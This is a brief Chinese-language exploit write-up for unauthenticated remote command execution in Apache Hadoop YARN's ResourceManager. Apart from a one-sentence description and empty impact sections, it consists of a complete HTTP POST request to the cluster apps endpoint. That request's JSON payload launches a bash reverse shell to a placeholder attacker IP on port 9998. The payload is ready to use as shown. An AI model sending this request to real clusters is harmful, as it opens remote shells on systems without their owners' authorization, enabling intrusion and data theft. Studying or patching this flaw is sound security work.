# Apache Hadoop Yarn RPC 远程命令执行漏洞

# 漏洞描述

Hadoop Yarn RPC未授权访问漏洞存在于Hadoop Yarn中负责资源管理和任务调度的ResourceManager,成因是该组件为用户提供的RPC服务默认情况下无需认证即可访问,

# 漏洞影响


# 网络测绘


# 漏洞复现

主页面

img

验证请求包

POST /ws/v1/cluster/apps HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 215
Content-Type: application/json

{"application-id": "application_1655112607010_0005", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9998 0>&1"}}, "application-type": "YARN"}
1
2
3
4
5
6
7
8

img